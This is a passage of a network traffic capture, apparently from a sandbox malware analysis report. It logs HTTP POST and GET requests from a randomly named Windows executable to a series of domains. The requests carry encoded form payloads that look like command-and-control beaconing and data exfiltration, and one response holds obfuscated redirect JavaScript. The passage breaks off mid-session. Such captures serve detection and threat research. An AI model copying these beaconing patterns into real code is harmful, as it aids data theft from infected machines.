                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:39:03.495410919 CEST | 397 | IN | HTTP/1.1 200 OK
                                                            Server: openresty
                                                            Date: Wed, 03 Jul 2024 15:39:03 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 257
                                                            Connection: close
                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?vX=uTYyZSOtPBVL0hIsKgpi95HQtVEr7RxE1GtfhiQgzt00yp3pQHZ/yduqmfXPDQ0x8hM1I2y7MNxQRHVIE3PkPDlbAMuSsvV/gP9PT/eZTJpyk9nI4JynE2g=&_B7=LxyxWrj8kri0gh"}</script></head></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            41 | 192.168.11.20 | 49815 | 84.32.84.192 | 80 | 7100 | C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jul 3, 2024 17:39:17.207076073 CEST | 785 | OUT | POST /12kg/ HTTP/1.1
                                                            Host: www.paliinfra.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.paliinfra.com
                                                            Referer: http://www.paliinfra.com/12kg/
                                                            Content-Length: 199
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:39:18.127497911 CEST | 1211 | IN | HTTP/1.1 301 Moved Permanently
                                                            Server: hcdn
                                                            Date: Wed, 03 Jul 2024 15:39:17 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 795
                                                            Connection: close
                                                            location: https://www.paliinfra.com/12kg/
                                                            platform: hostinger
                                                            content-security-policy: upgrade-insecure-requests
                                                            alt-svc: h3=":443"; ma=86400
                                                            x-hcdn-request-id: 3b7db2fe631920e3f27fa80e3000aa47-asc-edge6
                                                            x-hcdn-cache-status: DYNAMIC
                                                            x-hcdn-upstream-rt: 0.644
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            42 | 192.168.11.20 | 49816 | 84.32.84.192 | 80 | 7100 | C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jul 3, 2024 17:39:20.021413088 CEST | 1125 | OUT | POST /12kg/ HTTP/1.1
                                                            Host: www.paliinfra.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.paliinfra.com
                                                            Referer: http://www.paliinfra.com/12kg/
                                                            Content-Length: 539
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:39:20.926676989 CEST | 1211 | IN | HTTP/1.1 301 Moved Permanently
                                                            Server: hcdn
                                                            Date: Wed, 03 Jul 2024 15:39:20 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 795
                                                            Connection: close
                                                            location: https://www.paliinfra.com/12kg/
                                                            platform: hostinger
                                                            content-security-policy: upgrade-insecure-requests
                                                            alt-svc: h3=":443"; ma=86400
                                                            x-hcdn-request-id: d98ea308764777e3b09062362b1f36ca-asc-edge4
                                                            x-hcdn-cache-status: DYNAMIC
                                                            x-hcdn-upstream-rt: 0.641
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            43 | 192.168.11.20 | 49817 | 84.32.84.192 | 80 | 7100 | C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jul 3, 2024 17:39:22.826396942 CEST | 7734 | OUT | POST /12kg/ HTTP/1.1
                                                            Host: www.paliinfra.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.paliinfra.com
                                                            Referer: http://www.paliinfra.com/12kg/
                                                            Content-Length: 52927
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:39:23.324693918 CEST3867OUTData Raw: 75 36 34 70 38 70 68 30 37 76 76 5a 54 79 68 65 5a 71 6a 64 57 73 37 31 68 67 6e 64 4b 46 54 46 6f 79 64 74 2b 36 73 6c 42 35 73 30 51 73 54 37 69 66 6f 4d 65 4f 43 6d 4b 49 45 72 64 35 44 42 38 67 55 6f 49 48 35 2f 33 6c 44 50 70 73 38 46 4b 43
                                                            Data Ascii: u64p8ph07vvZTyheZqjdWs71hgndKFTFoydt+6slB5s0QsT7ifoMeOCmKIErd5DB8gUoIH5/3lDPps8FKCdBMopMePBa8Z86x/DcZ8diFvBtIOir65D9ZscHwDwM1LFdfewMvWXXlDMwXiORXfrWA0GSj9mG2FDzedxBaOh94Nhhn8LqhT99aWOkfYGWFdr/X7qyiSof3kZTYrwYgyUu8lolYxCM42ybO9eq9gb+uDKVvZHMz+x
                                                            Jul 3, 2024 17:39:23.324744940 CEST5156OUTData Raw: 4f 41 51 41 55 58 6b 4a 64 63 34 50 6a 4c 2b 6a 31 6f 31 53 65 65 62 59 33 77 47 50 32 52 51 2b 4f 56 43 34 67 65 76 70 48 71 51 68 66 59 67 43 7a 4b 66 77 72 6d 75 79 50 47 41 6f 56 7a 2b 6f 33 55 39 70 74 63 6c 6a 6e 2b 75 4b 7a 54 61 6f 2f 42
                                                            Data Ascii: OAQAUXkJdc4PjL+j1o1SeebY3wGP2RQ+OVC4gevpHqQhfYgCzKfwrmuyPGAoVz+o3U9ptcljn+uKzTao/B61TWeKFNj9vvQCiRgw0GDGsrQP1LCackQN4McbzCMTDEXVdJVWS7rHLYxEUCJtnGSAXwfAAcegyJpRYgwts4zydGERNotfTbd88Cm/AUdX6nZqG9bpHkp+uwQhH0n3v/vi/Dt0fNMaEbRxesyB4UPJEEDW+liB4xd
                                                            Jul 3, 2024 17:39:23.324791908 CEST5829OUTData Raw: 48 61 75 75 58 64 35 33 7a 4c 43 37 36 38 6d 68 77 66 4b 34 37 4b 51 77 46 72 53 47 4b 39 36 64 52 46 64 38 67 46 79 6b 45 2f 7a 46 35 72 4c 50 4b 33 61 77 6f 6d 31 65 44 57 67 73 6b 64 55 43 41 4d 71 79 73 6f 4f 50 30 4e 33 75 48 6c 4a 50 36 54
                                                            Data Ascii: HauuXd53zLC768mhwfK47KQwFrSGK96dRFd8gFykE/zF5rLPK3awom1eDWgskdUCAMqysoOP0N3uHlJP6TkBtNyZHSvydQlTL4Aq2eXGDyk+mC8lkEQvDnfkwp/JmB1UqBW2/CXtWviDIeI+9+h9+9Ge95AeaBRUTPJzj4gZ43Q+wXIddG+Ae9vHM0RgETgGc/U2B+BkYTkxXwF6AuutkrEAQonzdNnN5/m5G4w6w2Y5BaVxIAZ
                                                            Jul 3, 2024 17:39:24.262131929 CEST | 1211 | IN | HTTP/1.1 301 Moved Permanently
                                                            Server: hcdn
                                                            Date: Wed, 03 Jul 2024 15:39:24 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 795
                                                            Connection: close
                                                            location: https://www.paliinfra.com/12kg/
                                                            platform: hostinger
                                                            content-security-policy: upgrade-insecure-requests
                                                            alt-svc: h3=":443"; ma=86400
                                                            x-hcdn-request-id: ef12695f63427e8a33704ec304a9f7ef-asc-edge5
                                                            x-hcdn-cache-status: DYNAMIC
                                                            x-hcdn-upstream-rt: 0.666
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            44 | 192.168.11.20 | 49818 | 84.32.84.192 | 80 | 7100 | C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jul 3, 2024 17:39:25.651051998 CEST | 521 | OUT | GET /12kg/?vX=FNzl8wnE++HPhG206OaKKCmPORssckNSyI+M4a86U0qBkTFFPriGBeWQyCEz+v1Kx2tJcxLpZ/phLMA1BmxsvaSisGFPcKMREi9fCQxgCdocMTbgTC3h6NU=&_B7=LxyxWrj8kri0gh HTTP/1.1
                                                            Host: www.paliinfra.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:39:26.555114985 CEST | 1289 | IN | HTTP/1.1 301 Moved Permanently
                                                            Server: hcdn
                                                            Date: Wed, 03 Jul 2024 15:39:26 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 795
                                                            Connection: close
                                                            location: https://www.paliinfra.com/12kg/?vX=FNzl8wnE++HPhG206OaKKCmPORssckNSyI+M4a86U0qBkTFFPriGBeWQyCEz+v1Kx2tJcxLpZ/phLMA1BmxsvaSisGFPcKMREi9fCQxgCdocMTbgTC3h6NU=&_B7=LxyxWrj8kri0gh
                                                            platform: hostinger
                                                            content-security-policy: upgrade-insecure-requests
                                                            alt-svc: h3=":443"; ma=86400
                                                            x-hcdn-request-id: e414735422a99c70a6ef87d2cb41b235-asc-edge3
                                                            x-hcdn-cache-status: MISS
                                                            x-hcdn-upstream-rt: 0.644
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The docume
                                                            Jul 3, 2024 17:39:26.555211067 CEST | 62 | IN | Data Raw: 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: nt has been permanently moved.</p></div></div></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                            45 | 192.168.11.20 | 49820 | 3.33.130.190 | 80
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jul 3, 2024 17:41:04.604430914 CEST | 788 | OUT | POST /tq5r/ HTTP/1.1
                                                            Host: www.selllaptop.org
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.selllaptop.org
                                                            Referer: http://www.selllaptop.org/tq5r/
                                                            Content-Length: 199
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Ascii: vX=7YJFN6j4adbLY+ADHfbff7gQDSsVkPeXu0UUjRTG56wWhSros6g/559ABADIIxYF0vD/wY6vj7tq+gRpoe1+laMj0ILmkslXD/b/yLgtWDEAosPfqzYZXMG87KNDwOx2V/ik83JqVa4KbB3rTQf/dYO/VIDKfblR2tm5EHVitxoikvTWi7nugSqxs21nr0W+hQ==


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                            46 | 192.168.11.20 | 49821 | 3.33.130.190 | 80
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jul 3, 2024 17:41:07.282335043 CEST | 1128 | OUT | POST /tq5r/ HTTP/1.1
                                                            Host: www.selllaptop.org
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.selllaptop.org
                                                            Referer: http://www.selllaptop.org/tq5r/
                                                            Content-Length: 539
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                            47 | 192.168.11.20 | 49822 | 3.33.130.190 | 80
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jul 3, 2024 17:41:09.955025911 CEST | 2578 | OUT | POST /tq5r/ HTTP/1.1
                                                            Host: www.selllaptop.org
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.selllaptop.org
                                                            Referer: http://www.selllaptop.org/tq5r/
                                                            Content-Length: 52927
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                            48 | 192.168.11.20 | 49823 | 3.33.130.190 | 80
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jul 3, 2024 17:41:12.622332096 CEST | 522 | OUT | GET /tq5r/?vX=2ahlOPqFbaLRJ59RJMyuJ7IfIQg9pPTz0C4c2znY6LEO/TCdmpUdsfBsLge4LzAAnPKkz9TLh65OzxMJqcN49ZYZ04DS6e4TLs38paEuEBs4iPeVqFZufcc=&_B7=LxyxWrj8kri0gh HTTP/1.1
                                                            Host: www.selllaptop.org
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:41:12.766969919 CEST | 397 | IN | HTTP/1.1 200 OK
                                                            Server: openresty
                                                            Date: Wed, 03 Jul 2024 15:41:12 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 257
                                                            Connection: close
                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?vX=2ahlOPqFbaLRJ59RJMyuJ7IfIQg9pPTz0C4c2znY6LEO/TCdmpUdsfBsLge4LzAAnPKkz9TLh65OzxMJqcN49ZYZ04DS6e4TLs38paEuEBs4iPeVqFZufcc=&_B7=LxyxWrj8kri0gh"}</script></head></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                            49 | 192.168.11.20 | 49824 | 74.208.236.38 | 80
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jul 3, 2024 17:41:21.068289042 CEST | 520 | OUT | GET /9m56/?_B7=LxyxWrj8kri0gh&vX=wSNNrhltoDErcnEzxm9/w28Dp1eoX3XTDY+0HSDY/xjQqFM+lgiwoO0LpiVzuA8Bz+prc1fM5Kq2+VzXMkRPAHQ+fn8FfBllirngXHZ4XxgzDhA7JZPwDGY= HTTP/1.1
                                                            Host: www.costmoon.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:41:21.202608109 CEST | 770 | IN | HTTP/1.1 404 Not Found
                                                            Content-Type: text/html
                                                            Content-Length: 626
                                                            Connection: close
                                                            Date: Wed, 03 Jul 2024 15:41:21 GMT
                                                            Server: Apache
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                            50 | 192.168.11.20 | 49825 | 142.202.6.230 | 80
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jul 3, 2024 17:41:26.425379038 CEST | 788 | OUT | POST /hqcp/ HTTP/1.1
                                                            Host: www.6171nvuhb.rent
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.6171nvuhb.rent
                                                            Referer: http://www.6171nvuhb.rent/hqcp/
                                                            Content-Length: 199
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Ascii: vX=X5xwEotSV/RSS3LXuNj028r0i8vc/B0/yCf4GfFsEKu1yyag44SVgF+b2A/pYykOwfLwapKL67vlrbDrXkbkEx7A2aVAfmNbmEk7Rx184thn+y+ZkBPmMmWkKorkEsfB+IvtQktlyPOL2zU9RtD08VBohZiApbLvFTIKYY+gKb1XSafTk2elPIELgEJKFv/1XA==
                                                            Jul 3, 2024 17:41:27.581568956 CEST | 715 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Wed, 03 Jul 2024 15:41:27 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Content-Encoding: gzip


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                            51 | 192.168.11.20 | 49826 | 142.202.6.230 | 80
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jul 3, 2024 17:41:29.155994892 CEST | 1128 | OUT | POST /hqcp/ HTTP/1.1
                                                            Host: www.6171nvuhb.rent
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.6171nvuhb.rent
                                                            Referer: http://www.6171nvuhb.rent/hqcp/
                                                            Content-Length: 539
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:41:30.329432011 CEST | 715 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Wed, 03 Jul 2024 15:41:30 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Content-Encoding: gzip


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                            52 | 192.168.11.20 | 49827 | 142.202.6.230 | 80
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jul 3, 2024 17:41:31.874810934 CEST | 2578 | OUT | POST /hqcp/ HTTP/1.1
                                                            Host: www.6171nvuhb.rent
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.6171nvuhb.rent
                                                            Referer: http://www.6171nvuhb.rent/hqcp/
                                                            Content-Length: 52927
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:41:33.375262976 CEST | 715 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Wed, 03 Jul 2024 15:41:33 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Content-Encoding: gzip


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                            53 | 192.168.11.20 | 49828 | 142.202.6.230 | 80
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jul 3, 2024 17:41:34.589607954 CEST | 522 | OUT | GET /hqcp/?vX=a7ZQHf8WLvhHVBvdkZq5xuKGtafV4VgGgVvybuFCKLHzqS2zk6yuhV6s1hLkbw5zmPfcdtbcw9raqNmLcm/5LDv7+9F7BWl1gWJ1Gl5m9d8a+w3Gr0PmHHU=&_B7=LxyxWrj8kri0gh HTTP/1.1
                                                            Host: www.6171nvuhb.rent
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:41:35.763567924 CEST | 1283 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Wed, 03 Jul 2024 15:41:35 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Data Ascii: 442<script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"3IBsVSr2xOACIVJU",ck:"3IBsVSr2xOACIVJU"})</script><script>var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?800ccf274c3a593a3653e6acbfb00c7c"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script>...1--><script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"KQ2cxFS69unN6J8D",ck:"KQ2cxFS69unN6J8D"})</script><script>var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?be472e8744edb3816324a1183cdffac6"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script><script> var url = "https://aaa.za1.jecxs.cn/123.html"; var _0x0 = ["\x6C\x6F\x63\x61\x74\x69\x6F\x6E", "\x68\x72\x65\x66"]; s [TRUNCATED]


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                            54 | 192.168.11.20 | 49829 | 74.208.236.230 | 80
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jul 3, 2024 17:41:40.953568935 CEST | 803 | OUT | POST /9qp3/ HTTP/1.1
                                                            Host: www.motorsportgives.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.motorsportgives.com
                                                            Referer: http://www.motorsportgives.com/9qp3/
                                                            Content-Length: 199
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Ascii: vX=UXwO7QGHJMKTZZMAx4f4SDrSVzDVc+O0KjDuFXnsy/ATnzalIsgZVEkVzKhX63JyezQysCxiN0y5nmFGcN5favY8ZV/8d21xjeGY/a0JKuAYF1TJIfzr2QguDFpm3CjzwKu9Pd5vEjmFPcs/8Wh9FZSz39sI7OQwjVR15hsxu4JC3EKvwkrimILwC+mi3XJhog==
                                                            Jul 3, 2024 17:41:41.092703104 CEST | 580 | IN | HTTP/1.1 404 Not Found
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Date: Wed, 03 Jul 2024 15:41:41 GMT
                                                            Server: Apache
                                                            Content-Encoding: gzip


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                            55 | 192.168.11.20 | 49830 | 74.208.236.230 | 80
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jul 3, 2024 17:41:43.646683931 CEST | 1143 | OUT | POST /9qp3/ HTTP/1.1
                                                            Host: www.motorsportgives.com
